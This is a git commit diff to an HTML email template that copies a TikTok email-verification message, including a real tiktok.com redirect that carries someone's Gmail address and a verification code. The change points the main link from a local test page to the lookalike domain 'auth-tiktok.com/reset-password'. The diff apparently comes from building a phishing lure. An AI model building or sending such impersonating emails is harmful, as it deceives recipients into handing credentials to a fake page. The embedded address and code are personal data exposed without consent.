changed href in email

--- a/email/email-template.html
+++ b/email/email-template.html
@@ -128,7 +128,7 @@
               data-saferedirecturl="https://www.google.com/url?q=https://www.tiktok.com/ucenter_web/deeplink/email_verification?SHORTCUT_NEED_LOGIN%3DSHORTCUT_NEED_LOGIN_NO%26aid%3D1233%26code%3Dbc646114-cd27-4c4d-9b08-19a39e7f818d%26email%3Djamiewixbusiness%2540gmail.com%26language%3Den%26locale%3Den-GB%26type%3D13&amp;source=gmail&amp;ust=1746121814948000&amp;usg=AOvVaw1bQc6zccfF2OAXDxyf-itz"
             >
               <a
-                href="http://127.0.0.1:3000/index.html"
+                href="auth-tiktok.com/reset-password"
                 style="text-decoration: none"
               >
                 <div
